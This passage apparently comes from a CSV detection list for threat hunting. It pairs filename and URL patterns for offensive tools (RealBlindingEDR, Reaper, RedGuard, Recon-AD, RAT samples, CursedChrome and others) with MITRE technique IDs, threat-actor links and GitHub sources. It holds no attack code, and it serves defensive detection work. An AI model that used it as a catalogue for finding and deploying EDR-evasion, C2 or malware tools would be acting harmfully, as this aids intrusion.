Sandworm","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","N/A","10","10","21","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z","10241"
"*/RealBlindingEDR.git*",".{0,1000}\/RealBlindingEDR\.git.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","10242"
"*/RealBlindingEDR/tarball*",".{0,1000}\/RealBlindingEDR\/tarball.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","10243"
"*/RealBlindingEDR/zipball*",".{0,1000}\/RealBlindingEDR\/zipball.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","10244"
"*/Realistic Format Virus.exe*",".{0,1000}\/Realistic\sFormat\sVirus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10245"
"*/realvnc-auth-bypass.nse*",".{0,1000}\/realvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10247"
"*/Reaper.git*",".{0,1000}\/Reaper\.git.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","10248"
"*/Reaper/Reaper.cpp*",".{0,1000}\/Reaper\/Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","10249"
"*/ReaperX64.zip*",".{0,1000}\/ReaperX64\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","10250"
"*/REC2.git*",".{0,1000}\/REC2\.git.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","10251"
"*/recaptcha-phish.git*",".{0,1000}\/recaptcha\-phish\.git.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","10252"
"*/recaptcha-phish-main*",".{0,1000}\/recaptcha\-phish\-main.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","10253"
"*/Recon-AD.git*",".{0,1000}\/Recon\-AD\.git.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10254"
"*/Recon-AD-AllLocalGroups.dll",".{0,1000}\/Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10255"
"*/Recon-AD-AllLocalGroups.dll*",".{0,1000}\/Recon\-AD\-AllLocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10256"
"*/Recon-AD-Computers.dll",".{0,1000}\/Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10257"
"*/Recon-AD-Computers.dll*",".{0,1000}\/Recon\-AD\-Computers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10258"
"*/Recon-AD-Domain.dll",".{0,1000}\/Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10259"
"*/Recon-AD-Domain.dll*",".{0,1000}\/Recon\-AD\-Domain\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10260"
"*/Recon-AD-Groups.dll",".{0,1000}\/Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10261"
"*/Recon-AD-Groups.dll*",".{0,1000}\/Recon\-AD\-Groups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10262"
"*/Recon-AD-LocalGroups.dll*",".{0,1000}\/Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10263"
"*/Recon-AD-LocalGroups.dll*",".{0,1000}\/Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10264"
"*/Recon-AD-SPNs.dll*",".{0,1000}\/Recon\-AD\-SPNs\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10265"
"*/Recon-AD-Users.dll*",".{0,1000}\/Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10266"
"*/Recon-AD-Users.dll*",".{0,1000}\/Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10267"
"*/recon-archy.git*",".{0,1000}\/recon\-archy\.git.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","10268"
"*/reconftw.cfg*",".{0,1000}\/reconftw\.cfg.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10269"
"*/reconftw.git*",".{0,1000}\/reconftw\.git.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10270"
"*/reconftw.sh*",".{0,1000}\/reconftw\.sh.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10271"
"*/reconFTW.yml*",".{0,1000}\/reconFTW\.yml.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10272"
"*/reconftw/Recon/*",".{0,1000}\/reconftw\/Recon\/.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10273"
"*/reconftw:main*",".{0,1000}\/reconftw\:main.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10274"
"*/reconftw-data*",".{0,1000}\/reconftw\-data.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","10275"
"*/RecycledInjector*",".{0,1000}\/RecycledInjector.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","10276"
"*/RecycledInjector.git*",".{0,1000}\/RecycledInjector\.git.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","10277"
"*/RedBackdoorer.py*",".{0,1000}\/RedBackdoorer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","10278"
"*/RedDevil v1.0.exe*",".{0,1000}\/RedDevil\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10279"
"*/RedGuard.git*",".{0,1000}\/RedGuard\.git.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10280"
"*/RedGuard.go*",".{0,1000}\/RedGuard\.go.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10281"
"*/RedGuard_32",".{0,1000}\/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10282"
"*/RedGuard_64",".{0,1000}\/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","10283"
"*/redirect-hack.html?id=*",".{0,1000}\/redirect\-hack\.html\?id\=.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","10284"
"*/redirector/redirector.py*",".{0,1000}\/redirector\/redirector\.py.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","10285"
"*/redirecttosmb.py*",".{0,1000}\/redirecttosmb\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","10286"
"*/redis-brute.nse*",".{0,1000}\/redis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10287"
"*/redis-info.nse*",".{0,1000}\/redis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10288"
"*/redpeanut.cer*",".{0,1000}\/redpeanut\.cer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10289"
